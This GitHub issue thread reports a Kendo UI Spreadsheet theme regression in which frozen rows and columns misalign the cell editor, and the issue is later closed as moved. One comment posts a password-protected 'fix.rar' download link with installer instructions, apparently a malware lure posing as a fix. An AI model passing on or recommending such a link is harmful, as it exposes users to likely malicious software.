### ISSUE TITLE
Spreadsheet frozen rows and columns causing editor to shift out of the active cell 

### ISSUE THREAD

**Issue by nelito987** [telerik/kendo-themes#5156]
**Describe the bug**
When the Spreadsheet have frozen row and column and the user try to edit a cell, the active cell is slightly misaligned. The issue is easy to be observed when there is a background color set to the active cell. 

**To reproduce**

1. Open https://dojo.telerik.com/@NeliK/OPawONOZ
1. Edit a cell

**Expected behavior**
The active cell should not be misaligned.

**Screenshots**
![image](https://github.com/user-attachments/assets/673c6d19-89fa-4b46-bdc6-a571cc21640a)

**Affected package (please remove the unneeded items)**
* theme-default
* theme-bootstrap
* theme-material
* theme-tasks

**Affected suites (please remove the unneeded items)**
* Kendo UI for jQuery
* Kendo UI for Angular
* Kendo UI for React
* Kendo UI for Vue
* Telerik UI for Blazor

**Affected browsers (please remove the unneeded items)**
* All

**Build system information (please remove the unneeded items)**
* Not Applicable
* OS: [for example, Windows, Linux, Mac]
* Node version: [for example, 10.15.3]
* NPM version: [for example, 6.4.1]

** the issue is a regression starting with themes version 5.0.0 (Kendo jQuery version 2022.1.119)

**Comment by 13a10D** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by nelito987** [comment]
I am closing the issue as it is moved in the Spreadsheet common repo - https://github.com/telerik/kendo-spreadsheet-common/issues/90
